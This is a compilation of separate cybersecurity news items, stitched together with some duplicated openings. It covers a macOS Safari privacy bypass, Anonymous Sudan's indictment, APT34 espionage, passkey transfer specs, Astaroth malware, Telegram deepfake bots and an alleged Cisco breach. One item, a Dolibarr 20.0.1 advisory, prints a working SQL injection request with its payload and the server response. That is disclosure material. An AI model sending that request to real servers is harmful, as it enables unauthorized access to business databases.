Microsoft has disclosed details about a now-patched security flaw in Apple's Transparency, Consent, and Control (TCC) framework in macOS that has likely come under exploitation to get around a user's privacy preferences and access data.
The shortcoming, codenamed HM Surf by the tech giant, is tracked as CVE-2024-44133. It was addressed by Apple as part of macOS Sequoia 15 by removing the

Threat Intelligence / Browser Security

Microsoft has disclosed details about a now-patched security flaw in Apple's Transparency, Consent, and Control (TCC) framework in macOS that has likely come under exploitation to get around a user's privacy preferences and access data.

The shortcoming, codenamed HM Surf by the tech giant, is tracked as CVE-2024-44133. It was addressed by Apple as part of macOS Sequoia 15 by removing the vulnerable code.

HM Surf "involves removing the TCC protection for the Safari browser directory and modifying a configuration file in the said directory to gain access to the user's data, including browsed pages, the device's camera, microphone, and location, without the user's consent," Jonathan Bar Or of the Microsoft Threat Intelligence team said.

Microsoft said the new protections are limited to Apple's Safari browser, and that it's working with other major browser vendors to further explore the benefits of hardening local configuration files.

HM Surf follows Microsoft's discovery of Apple macOS flaws like Shrootless, powerdir, Achilles, and Migraine that could enable malicious actors to sidestep security enforcements.

While TCC is a security framework that prevents apps from accessing users' personal information without their consent, the newly discovered bug could enable attackers to bypass this requirement and gain access to location services, address book, camera, microphone, downloads directory, and others in an unauthorized manner.

The access is governed by a set of entitlements, with Apple's own apps like Safari having the ability to completely sidestep TCC using the "com.apple.private.tcc.allow" entitlement.

While this allows Safari to freely access sensitive permissions, it also incorporates a new security mechanism called Hardened Runtime that makes it harder to execute arbitrary code in the context of the web browser.

That said, when users visit a website that requests location or camera access for the first time, Safari prompts for access via a TCC-like popup. These entitlements are stored on a per-website basis within various files located in the "~/Library/Safari" directory.

The HM Surf exploit devised by Microsoft hinges on performing the following steps -

*   Changing the home directory of the current user with the dscl utility, a step that does not require TCC access in macOS Sonoma
*   Modifying the sensitive files (e.g., PerSitePreferences.db) within "~/Library/Safari" under the user's real home directory
*   Changing the home directory back to the original directory causes Safari to use the modified files
*   Launching Safari to open a web page that takes a snapshot via the device's camera and grab the location

The attack could be extended further to save an entire camera stream or stealthily capture audio through the Mac's microphone, Microsoft said. Third-party web browsers don't suffer from this problem as they do not have the same private entitlements as Apple applications.

Microsoft noted it observed suspicious activity associated with a known macOS adware threat named AdLoad likely exploiting the vulnerability, making it imperative that users take steps to apply the latest updates.

"Since we weren't able to observe the steps taken leading to the activity, we can't fully determine if the AdLoad campaign is exploiting the HM surf vulnerability itself," Bar Or said. "Attackers using a similar method to deploy a prevalent threat raises the importance of having protection against attacks using this technique."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Reveals macOS Vulnerability that Bypasses Privacy Controls in Safari Browser

US officials disrupted the group's DDoS operation and arrested two individuals behind it, who turned out to be far less intimidating than they were made out to be in the media.

Source: Firoze Edassery via Alamy Stock Photo

A federal grand jury has indicted two Sudanese nationals for their role in operating and controlling one of the most notorious hacktivist groups of recent years.

US officials allege that Ahmed Salah Yousif Omer — just 22 years old — and his brother Alaa Salah Yusuuf Omer, 27, were behind Anonymous Sudan (aka Storm-1359), a threat actor responsible for more than 35,000 distributed denial of service (DDoS) attacks worldwide since early 2023. In the US alone, it has clogged up websites belonging to major technology companies like Microsoft and Riot Games, the Cedars-Sinai Medical Center in Los Angeles — an event which caused an eight-hour disruption to patient care — and major government agencies like the FBI, State Department, Department of Defense, and Department of Justice (DoJ). It's believed that these attacks have caused at least $10 million in damages.

For their roles in "operating and controlling" Anonymous Sudan, Ahmed and Alaa were each charged with one count of conspiracy to damage protected computers. Ahmed also earned three counts for damaging protected computers.

The elder brother faces a maximum sentence of five years in federal prison, should he be found guilty. The younger: life behind bars.

"It's easy to be anonymous, and to hide yourself for a short period of time when visibility is limited," says Adam Meyers, head of counter adversary operations with CrowdStrike, which contributed to the DoJ investigation. "But the longer that things go on, the more that you do, the harder it is to keep up that facade."

**The Latest in Operation PowerOFF**

For years now, law enforcement authorities from the United States, United Kingdom, Germany, Poland, and the Netherlands have been collaborating as part of "Operation PowerOFF," to shutter DDoS-for-hire operations worldwide. PowerOFF has earned some high-profile successes since, including the arrests of the admins behind Webstresser — then the world's leading DDoS marketplace — back in 2018, a successful shutdown of 50 DDoS-for-hire platforms late in 2022, and another wave of "booter site" takedowns the following year. Then, early this year, authorities turned their sights on Anonymous Sudan.

Hacktivist groups, by their nature, are typically louder and easier to read than groups which put more emphasis on stealth and subtlety. "These guys were operating openly on Telegram. They were recruiting. They were talking about what they were up to. They were involved in things like #OpIsrael, and collaborating with groups like KillNet on some pro-Russia attacks. So they weren't hiding in the shadows," Meyers says.

Beyond that, he adds, "They did have some of what we would call OpSec issues, where they thought that they were being a little bit more discreet than they actually were."

With help from the Big Pipes working group — a PowerOFF collaboration between law enforcement and private sector partners — authorities identified assets belonging to Anonymous Sudan, and insights into the brothers at the top of the pyramid. Then in March, US authorities obtained court-authorized warrants to seize the tooling and infrastructure belonging to Anonymous Sudan. The FBI shut up key components of the group's sophisticated Distributed Cloud Attack Tool (DCAT) (aka Skynet, Godzilla, InfraShutdown), including the computer servers used to launch its attacks, those used to relay attack commands to its broader network of connected computers, and online accounts containing the group's source code.

**Not-So-Anonymous Sudan**

During its approximately year-long reign of terror, Anonymous Sudan had been connected with and attributed to a variety of different groups and interests. Some researchers suggested that it was merely a front for the Russian hacktivist collective KillNet. Others went further, suggesting that the group is backed by the Russian state.

"That was a misconception that many folks believed and parroted, with little supporting evidence," explains Chad Seaman, principal security researcher and team lead at Akamai SIRT, which also participates in PowerOFF through the Big Pipes working group. "Mostly this theory seemed to be rooted in their affiliation with KillNet, which as disclosed in the indictment details, seems to be more \[borne of\] an anti-west ideological alignment, and kind of turned into a marketing decision, in part aimed at driving business to their booter services they were selling at the time, due to KillNet's notoriety at the time."

There were some understandable reasons behind those connections: the scale of the operation, its sophistication, its apparent motives, etc. "Take into account their seemingly oddly aligned support of Russian hacktivist groups, being a new group that seemingly sprung up overnight, their ability to launch debilitating attacks, and an assumption that their operations were being paid for to the tune of hundreds of thousands of dollars a month in compute expenses, it's an easy theory to rationalize," he says.

However, he adds, "Attribution is often hard and messy work, and short of very compelling evidence to support such claims, it should always be eyed with a bit of suspicion until proof is provided. This isn't the first time, and it won't be the last, that we've seen theorized attribution fall victim to reality when more pieces of the puzzle fall into place."  

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Anonymous Sudan Unmasked as Leaders Face Life in Prison

A MOIS-aligned threat group has been using Microsoft Exchange servers to exfiltrate sensitive data from Gulf-state government agencies.

Source: Daniren via Alamy Stock Photo

An Iranian threat actor has been ramping up its espionage against Gulf-state government entities, particularly those within the United Arab Emirates (UAE).

APT34 (aka Earth Simnavaz, OilRig, MuddyWater, Crambus, Europium, Hazel Sandstorm) is a group that has been previously tied to the Iranian Ministry of Intelligence and Security (MOIS). It's known to spy on high-value targets in major industries across the Middle East: oil and gas; finance; chemicals; telecommunications; other forms of critical infrastructure; and governments. Its attacks have demonstrated a sophistication befitting its targets, with suites of custom malware and an ability to evade detection for long periods of time.

Recently, Trend Micro has observed a "notable rise" in APT34's espionage and theft of sensitive information from government agencies, most notably within the UAE. These newer cases have featured a new backdoor, "StealHook," which uses Microsoft Exchange servers to exfiltrate credentials useful for escalating privileges and performing follow-on supply chain attacks.

**APT34's Latest Activity**

Recent APT34 attacks have begun with Web shells deployed to vulnerable Web servers. These Web shells allow the hackers to run PowerShell code, and download or upload files from or to the compromised server.

One tool it downloads, for example, is ngrok, legitimate reverse proxy software for creating secure tunnels between local machines and the broader Internet. APT34 weaponizes ngrok as a means of command-and-control (C2) that tunnels through firewalls and other network security barricades, facilitating its path to a network's Domain Controller.

"One of the most impressive feats we've observed from APT34 is their skill in crafting and fine-tuning stealthy exfiltration channels that allow them to steal data from high profile sensitive networks," notes Sergey Shykevich, threat intelligence group manager at Check Point Research, which recently uncovered an APT34 espionage campaign against Iraqi government ministries. In its prior campaigns, the group has mostly secured its C2 communications via DNS tunneling and compromised email accounts.

To obtain greater privileges on infected machines, APT34 has been exploiting CVE-2024-30088. Discovered through the Trend Micro Zero Day Initiative (ZDI) and patched back in June, CVE-2024-30088 allows attackers to gain system-level privileges in Windows. It affects multiple versions of Windows 10 and 11, and Windows Server 2016, 2019, and 2022, and received a "high" severity 7 out of 10 score in the Common Vulnerability Scoring System (CVSS). That rating would've been higher, but for the fact that it requires local access to a system, and isn't simple to exploit.

APT34's best trick, though, is its technique for abusing Windows password filters.

Windows allows organizations to implement custom password security policies — for example, to enforce good hygiene among users. APT34 drops a malicious DLL into the Windows system directory, registering it like one would a legitimate password filter. That way, if a user changes their password — a good cybersecurity practice to do often — APT34's malicious filter will intercept it, in plaintext.

To complete its attack, APT34 calls on its newest backdoor, StealHook. StealHook retrieves domain credentials that allow it into an organization's Microsoft Exchange servers. Using the targeted organization's servers and stolen email accounts, the backdoor can now exfiltrate stolen credentials and other sensitive government data via email attachments.

**Follow-On Risks of APT34 Attacks**

"The technique of abusing Exchange for data exfiltration and C&C is very effective and hard to detect," says Mohamed Fahmy, cyber threat intelligence researcher at Trend Micro. "It has been used for years in \[APT34's\] Karkoff backdoor, and most of the time it evades detection."

Besides exfiltrating sensitive account credentials and other government data, APT34 has also been known to leverage this level of access in one organization to carry out follow-on attacks against others tied to it.

For some time now, Fahmy says, the threat actor has "fully compromised a specific organization, and then used its servers to initiate a new attack against another organization (having a trust relationship with the infected one). In this case, the threat actor can leverage Exchange to send phishing emails."

He adds that government agencies in particular often relate to one another closely, "so the threat actor could compromise this trust."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Iran's APT34 Abuses MS Exchange to Spy on Gulf Gov'ts

The FIDO Alliance said it's working to make passkeys and other credentials more easier to export across different providers and improve credential provider interoperability, as more than 12 billion online accounts become accessible with the passwordless sign-in method.
To that end, the alliance said it has published a draft for a new set of specifications for secure credential exchange,

Data Privacy / Passwordless

The FIDO Alliance said it's working to make passkeys and other credentials more easier to export across different providers and improve credential provider interoperability, as more than 12 billion online accounts become accessible with the passwordless sign-in method.

To that end, the alliance said it has published a draft for a new set of specifications for secure credential exchange, following commitments among members of its Credential Provider Special Interest Group (SIG).

This includes 1Password, Apple, Bitwarden, Dashlane, Enpass, Google, Microsoft, NordPass, Okta, Samsung, and SK Telecom.

"Secure credential exchange is a focus for the FIDO Alliance because it can help further accelerate passkey adoption and enhance user experience," the FIDO Alliance said in a statement.

"Sign-ins with passkeys reduce phishing and eliminate credential reuse while making sign-ins up to 75% faster, and 20% more successful than passwords or passwords plus a second factor like SMS OTP."

While passkeys have the advantage of being secure and phishing-resistant, they are essentially locked in to the operating system or the password manager service, making it impossible to transfer them when switching platforms and, therefore, requiring users to create new passkeys per device.

The new specification proposed by the FIDO Alliance aims to address this gap with the Credential Exchange Protocol (CXP) and Credential Exchange Format (CXF).

They "define a standard format for transferring credentials in a credential manager including passwords, passkeys, and more to another provider in a manner that ensures transfer are not made in the clear and are secure by default," it said.

The development comes as Amazon revealed that more than 175 million customers have enabled passkeys on their accounts, nearly one year after the initial rollout.

"Passkeys fundamentally shift the way we sign in to our online accounts for the better — and seeing Amazon roll out passkeys is evidence of its commitment to its customers' time, experiences, and security across Amazon web and mobile shopping experiences," said Andrew Shikiar, chief executive officer of FIDO Alliance.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

FIDO Alliance Drafts New Protocol to Simplify Passkey Transfers Across Different Platforms

A new spear-phishing campaign targeting Brazil has been found delivering a banking malware called Astaroth (aka Guildma) by making use of obfuscated JavaScript to slip past security guardrails.
"The spear-phishing campaign's impact has targeted various industries, with manufacturing companies, retail firms, and government agencies being the most affected," Trend Micro said in a new analysis.
"

Cyber Attack / Banking Trojan

A new spear-phishing campaign targeting Brazil has been found delivering a banking malware called Astaroth (aka Guildma) by making use of obfuscated JavaScript to slip past security guardrails.

"The spear-phishing campaign's impact has targeted various industries, with manufacturing companies, retail firms, and government agencies being the most affected," Trend Micro said in a new analysis.

"The malicious emails often impersonate official tax documents, using the urgency of personal income tax filings to trick users into downloading the malware."

The cybersecurity company is tracking the threat activity cluster under the name Water Makara. It's worth pointing out that Google's Threat Analysis Group (TAG) has assigned the moniker PINEAPPLE to a similar intrusion set that delivers the same malware to Brazilian users.

Both these campaigns share a point of commonality in that they commence with phishing messages that impersonate official entities such as Receita Federal and aim to trick recipients into downloading a ZIP archive attachment that masquerades as income tax documents.

Present within the harmful ZIP file is a Windows shortcut (LNK) that abuses mshta.exe, a legitimate utility meant to run HTML Application files, execute obfuscated JavaScript commands and establish connections to a command-and-control (C2) server.

"While Astaroth might seem like an old banking trojan, its reemergence and continued evolution make it a persistent threat," the researchers said.

"Beyond stolen data, its impact extends to long-term damage to consumer trust, regulatory fines, and increased costs from business disruption and downtime as well as recovery and remediation."

To mitigate the risk posed by such attacks, it's recommended to enforce strong password policies, use multi-factor authentication (MFA), keep security solutions and software updated, and apply the principle of least privilege (PoLP).

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Astaroth Banking Malware Resurfaces in Brazil via Spear-Phishing Attack

Dolibarr version 20.0.1 suffers from a remote SQL injection vulnerability.

## Titles: dolibarr 20.0.1 Multiple security token SQLi## Author: nu11secur1ty## Date: 10/15/2024## Vendor: https://www.dolibarr.org/## Software: https://www.dolibarr.org/downloads.php## Reference: https://portswigger.net/web-security/sql-injection## Description:The `socid` parameter appears to be vulnerable to SQL injection attacks.The attacker can get sensitive information for the MySQL database from thissystem when he attacks it online from inside!He can do this, by using a vulnerable security token to access the webapplication!STATUS: Medium- Vulnerability[+]Exploits:- SQLi Multiple:```POST /dolibarr-20.0.1/htdocs/commande/stats/index.php HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36Connection: closeCache-Control: max-age=0Cookie:DOLSESSID_0297178cd410ba92966a17032c81774a6acb1ec7=hsq658oejrct1401omd4nf2c5qOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer:http://pwnedhost.com/dolibarr-20.0.1/htdocs/commande/stats/index.php?leftmenu=orders_suppliers&mode=supplierContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129","Chromium";v="129"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 357token=ac1770a37880433e4ca36f69be4a8bf2&mode=supplier&socid=-1nu11secur1ty'%20or%201%3d1%23&typent_id=-1&categ_id=-1&userid=1&object_status_multiselect=1&object_status%5B%5D=0&object_status%5B%5D=1&object_status%5B%5D=2&object_status%5B%5D=3&object_status%5B%5D=4&object_status%5B%5D=5&object_status%5B%5D=6%2C7&object_status%5B%5D=9&year=2024&submit=Refresh```[+]Response:```SQLiHTTP/1.1 200 OKDate: Tue, 15 Oct 2024 10:23:43 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINReferrer-Policy: same-originConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 80974<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="author...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near'WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-3123:59:59'...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near'WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-3123:59:59'...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near'WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-3123:59:59'...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') as total, AVG() as avg FROM WHERE c.entity IN (1) AND c.fk_user_author =1...' at line 1<b```## Reproduce:[href](https://www.patreon.com/posts/dolibarr-20-0-1-114038337)## Demo PoC:[href](https://www.nu11secur1ty.com/2024/10/dolibarr-2001-multiple-security-token.html)## Time spent:05:27:00

Dolibarr 20.0.1 SQL Injection

Bots that “remove clothes” from images have run rampant on the messaging app, allowing people to create nonconsensual deepfake images even as lawmakers and tech companies try to crack down.

In early 2020, deepfake expert Henry Ajder uncovered one of the first Telegram bots built to “undress” photos of women using artificial intelligence. At the time, Ajder recalls, the bot had been used to generate more than 100,000 explicit photos—including those of children—and its development marked a “watershed” moment for the horrors deepfakes could create. Since then, deepfakes have become more prevalent, more damaging, and easier to produce.

Now, a WIRED review of Telegram communities involved with the explicit nonconsensual content has identified at least 50 bots that claim to create explicit photos or videos of people with only a couple of clicks. The bots vary in capabilities, with many suggesting they can “remove clothes” from photos while others claim to create images depicting people in various sexual acts.

The 50 bots list more than 4 million “monthly users” combined, according to WIRED's review of the statistics presented by each bot. Two bots listed more than 400,000 monthly users each, while another 14 listed more than 100,000 members each. The findings illustrate how widespread explicit deepfake creation tools have become and reinforce Telegram’s place as one of the most prominent locations where they can be found. However, the snapshot, which largely encompasses English-language bots, is likely a small portion of the overall deepfake bots on Telegram.

“We’re talking about a significant, orders-of-magnitude increase in the number of people who are clearly actively using and creating this kind of content,” Ajder says of the Telegram bots. “It is really concerning that these tools—which are really ruining lives and creating a very nightmarish scenario primarily for young girls and for women—are still so easy to access and to find on the surface web, on one of the biggest apps in the world.”

Explicit nonconsensual deepfake content, which is often referred to as nonconsensual intimate image abuse (NCII), has exploded since it first emerged at the end of 2017, with generative AI advancements helping fuel recent growth. Across the internet, a slurry of “nudify” and “undress” websites sit alongside more sophisticated tools and Telegram bots, and are being used to target thousands of women and girls around the world—from Italy’s prime minister to school girls in South Korea. In one recent survey, a reported 40 percent of US students were aware of deepfakes linked to their K-12 schools in the last year.

The Telegram bots identified by WIRED are supported by at least 25 associated Telegram channels—where people can subscribe to newsfeed-style updates—that have more than 3 million combined members. The Telegram channels alert people about new features provided by the bots and special offers on “tokens” that can be purchased to operate them, and often act as places where people using the bots can find links to new ones if they are removed by Telegram.

After WIRED contacted Telegram with questions about whether it allows explicit deepfake content creation on its platform, the company deleted the 75 bots and channels WIRED identified. The company did not respond to a series of questions or comment on why it had removed the channels.

Additional nonconsensual deepfake Telegram channels and bots later identified by WIRED show the scale of the problem. Several channel owners posted that their bots had been taken down, with one saying, “We will make another bot tomorrow.” Those accounts were also later deleted.

**Hiding in Plain Sight**

Telegram bots are, essentially, small apps that run inside of Telegram. They sit alongside the app’s channels, which can broadcast messages to an unlimited number of subscribers; groups where up to 200,000 people can interact; and one-to-one messages. Developers have created bots where people take trivia quizzes, translate messages, create alerts, or start Zoom meetings. They’ve also been co-opted for creating abusive deepfakes.

Due to the harmful nature of the deepfake tools, WIRED did not test the Telegram bots and is not naming specific bots or channels. While the bots had millions of monthly users, according to Telegram’s statistics, it is unclear how many images the bots may have been used to create. Some users, who could be in multiple channels and bots, may have created zero images; others could have created hundreds.

Many of the deepfake bots viewed by WIRED are clear about what they have been created to do. The bots’ names and descriptions refer to nudity and removing women’s clothes. “I can do anything you want about the face or clothes of the photo you give me,” the creators’ of one bot wrote. “Experience the shock brought by AI,” another says. Telegram can also show “similar channels” in its recommendation tool, helping potential users bounce between channels and bots.

Almost all of the bots require people to buy “tokens” to create images, and it is unclear if they operate in the ways they claim. As the ecosystem around deepfake generation has flourished in recent years, it has become a potentially lucrative source of income for those who create websites, apps, and bots. So many people are trying to use “nudify” websites that Russian cybercriminals, as reported by 404Media, have started creating fake websites to infect people with malware.

While the first Telegram bots, identified several years ago, were relatively rudimentary, the technology needed to create more realistic AI-generated images has improved—and some of the bots are hiding in plain sight.

One bot with more than 300,000 monthly users did not reference any explicit material in its name or landing page. However, once a user clicks to use the bot, it claims it has more than 40 options for images, many of which are highly sexual in nature. That same bot has a user guide, hosted on the web outside of Telegram, describing how to create the highest-quality images. Bot developers can require users to accept terms of service, which may forbid users from uploading images without the consent of the person depicted or images of children, but there appears to be little or no enforcement of these rules.

Another bot, which had more than 38,000 users, claimed people could send six images of the same man or woman—it is one of a small number that claims to create images of men—to “train” an AI model, which could then create new deepfake images of that individual. Once users joined one bot, it would present a menu of 11 “other bots” from the creators, likely to keep systems online and try to avoid removals.

“These types of fake images can harm a person’s health and well-being by causing psychological trauma and feelings of humiliation, fear, embarrassment, and shame,” says Emma Pickering, the head of technology-facilitated abuse and economic empowerment at Refuge, the UK’s largest domestic abuse organization. “While this form of abuse is common, perpetrators are rarely held to account, and we know this type of abuse is becoming increasingly common in intimate partner relationships.”

As explicit deepfakes have become easier to create and more prevalent, lawmakers and tech companies have been slow to stem the tide. Across the US, 23 states have passed laws to address nonconsensual deepfakes, and tech companies have bolstered some policies. However, apps that can create explicit deepfakes have been found in Apple and Google’s app stores, explicit deepfakes of Taylor Swift were widely shared on X in January, and Big Tech sign-in infrastructure has allowed people to easily create accounts on deepfake websites.

Kate Ruane, director of the Center for Democracy and Technology’s free expression project, says most major technology platforms now have policies prohibiting nonconsensual distribution of intimate images, with many of the biggest agreeing to principles to tackle deepfakes. “I would say that it’s actually not clear whether nonconsensual intimate image creation or distribution is prohibited on the platform,” Ruane says of Telegram’s terms of service, which are less detailed than other major tech platforms.

Telegram’s approach to removing harmful content has long been criticized by civil society groups, with the platform historically hosting scammers, extreme right-wing groups, and terrorism-related content. Since Telegram CEO and founder Pavel Durov was arrested and charged in France in August relating to a range of potential offenses, Telegram has started to make some changes to its terms of service and provide data to law enforcement agencies. The company did not respond to WIRED’s questions about whether it specifically prohibits explicit deepfakes.

**Execute the Harm**

Ajder, the researcher who discovered deepfake Telegram bots four years ago, says the app is almost uniquely positioned for deepfake abuse. “Telegram provides you with the search functionality, so it allows you to identify communities, chats, and bots,” Ajder says. “It provides the bot-hosting functionality, so it's somewhere that provides the tooling in effect. Then it’s also the place where you can share it and actually execute the harm in terms of the end result.”

In late September, several deepfake channels started posting that Telegram had removed their bots. It is unclear what prompted the removals. On September 30, a channel with 295,000 subscribers posted that Telegram had “banned” its bots, but it posted a new bot link for users to use. (The channel was removed after WIRED sent questions to Telegram.)

“One of the things that’s really concerning about apps like Telegram is that it is so difficult to track and monitor, particularly from the perspective of survivors,” says Elena Michael, the cofounder and director of #NotYourPorn, a campaign group working to protect people from image-based sexual abuse.

Michael says Telegram has been “notoriously difficult” to discuss safety issues with, but notes there has been some progress from the company in recent years. However, she says the company should be more proactive in moderating and filtering out content itself.

“Imagine if you were a survivor who’s having to do that themselves, surely the burden shouldn't be on an individual,” Michael says. “Surely the burden should be on the company to put something in place that's proactive rather than reactive.”

Millions of People Are Using Abusive AI ‘Nudify’ Bots on Telegram

Intel Broker claims a major data breach at Cisco, allegedly stealing source codes, confidential documents, and credentials from…

Intel Broker claims a major data breach at Cisco, allegedly stealing source codes, confidential documents, and credentials from global firms like Verizon, AT&T, Microsoft, and more. Data is now for sale on Breach Forums.

Intel Broker, a hacker notorious for high-profile data breaches, is claiming to have breached the technology giant Cisco Systems, Inc. In a post on the cybercrime platform **Breach Forums**, the hacker stated that the breach enabled them to steal a massive amount of sensitive information from Cisco’s systems.

According to the hacker, the alleged data breach took place on October 10, 2024, while the Breach Forum post was published earlier today on October 14, 2024.

Intel Broker’s post (Screenshot: Hackread.com)

****What Was Allegedly Stolen?****

As seen by the Hackread.com research team, Intel Broker has listed a massive amount of data that was allegedly stolen in the breach, including:

*   **Source Code**: Projects from GitHub, GitLab, and SonarQube, critical to Cisco’s development efforts.
*   **Hard-Coded Credentials**: Sensitive information like login details embedded in source code.
*   **Certificates and Keys**: SSL certificates, and public and private keys crucial for secure communications.
*   **Confidential Documents**: Internal documents and information classified as “Cisco Confidential.”
*   **API Tokens and Storage Buckets**: AWS private buckets, Azure storage buckets, and API tokens that could be used to access critical systems.
*   **Other Sensitive Information**: Jira tickets, Docker builds, and Cisco premium products are also listed.

****Impact on Major Corporations****

Intel Broker also shared a list of companies whose production source codes were allegedly taken during the breach. The list includes several high-profile firms, particularly in the telecommunications and financial sectors, such as:

*   **Telecom Companies**: Verizon, AT&T (USA and Mexico), British Telecom, T-Mobile (USA and Poland), Vodafone (Albania and Australia), and Turkcell.
*   **Financial Institutions**: Bank of America, Barclays, and National Australian Bank.
*   **Tech and Health**: Microsoft, Liberty Global, and Dignity Health.

Sample documents shared by the hacker (Screenshot: Hackread.com)

****Data for Sale****

Intel Broker is offering the stolen data for sale in exchange for Monero (XMR), a cryptocurrency known for its privacy features. The hacker indicated that they are open to using a middleman to facilitate the transaction, ensuring **anonymity** for both the buyer and seller. This method is a common practice among cybercriminals to avoid detection and tracking by authorities.

****Unverified but Serious Claims****

At the time of writing, Hackread.com, which first spotted the hacker’s claims, has reached out to Cisco for comment, but no official response has been given. The breach, if confirmed, could have major consequences for Cisco and the affected companies, raising concerns about the extent of the damage and the potential exploitation of the compromised data.

****Intel Broker and Previous Breaches****

Intel Broker is known for high-profile data breaches. **In June 2024**, the hacker claimed to have breached Apple Inc., stealing source code for internal tools. The same hacker boasted about **breaching AMD** (Advanced Micro Devices, Inc.), and stealing employee and product information.

**In May 2024**, Intel Broker hacked Europol, a breach that the agency later confirmed. Some of the hacker’s previous data breaches are listed below:

*   **Tech in Asia**
*   **Space-Eyes**
*   **Home Depot**
*   **Facebook Marketplace**
*   **U.S. contractor Acuity Inc.**
*   **Staffing giant Robert Half**
*   **Los Angeles International Airport**
*   **Alleged breaches of HSBC and Barclays Bank**

Although the hacker’s origins and affiliates are unknown, according to the United States government, IntelBroker is alleged to be the perpetrator behind one of the **T-Mobile data breaches**.

Nevertheless, these claims regarding the Cisco data breach go on to show the cybersecurity risks faced even by large organizations. As more details emerge, the scale of this breach and its potential fallout will be closely watched.

1.  **Akira Ransomware Targets Businesses via Exploited CISCO VPNs**
2.  **Cisco Network Breach as Employee’s Google Account** **was** **Hacked**
3.  **Hackers Claim 10TB Breach at Russian Cybersecurity Firm Dr.Web**
4.  **Hackers leave US flag after targeting Cisco switches in Russia & Iran**
5.  **Ex-worker hacked Cisco AWS Infrastructure; erased virtual machines**

Intel Broker Claims Cisco Breach, Selling Stolen Data from Major Firms

Education, including K-12 schools and universities, has become the third most targeted sector due to the high variety of sensitive data it stores in its databases.

Source: SeventyFour Images via Alamy Stock Photo

Malicious actors are increasingly targeting K-12 and higher education institutions, an "industry of industries" as Microsoft's new report calls it, due to the immense amount of private data that these enterprises handle.

From information regarding financial data to health records and other sensitive information, hackers have a host of pickings to choose from if they are successful in their exploitation attempts, Microsoft's Threat Intelligence report explained.

"The combination of value and vulnerability found in education systems has attracted the attention of a spectrum of cyberattackers — from malware criminals employing new techniques to nation-state threat actors engaging in old-school spy craft," Microsoft said.

Education as an industry faces a variety of issues that prompt attacks from hackers: security staffing limitations; difficult-to-secure IT systems; virtual/remote learning environments; extensive QR code usage; open email systems; lack of funding; and more. There's also the issue of users — some as young as 6 years old — who are too young to know safe cybersecurity habits and are liable to compromise a network. 

The education sector deals with an average of 2,507 attempted cyberattacks on a weekly basis from nation-state groups to ransomware gangs, with universities especially presenting their own unique challenges due to the culture of sharing information, research, and innovation, Microsoft found.

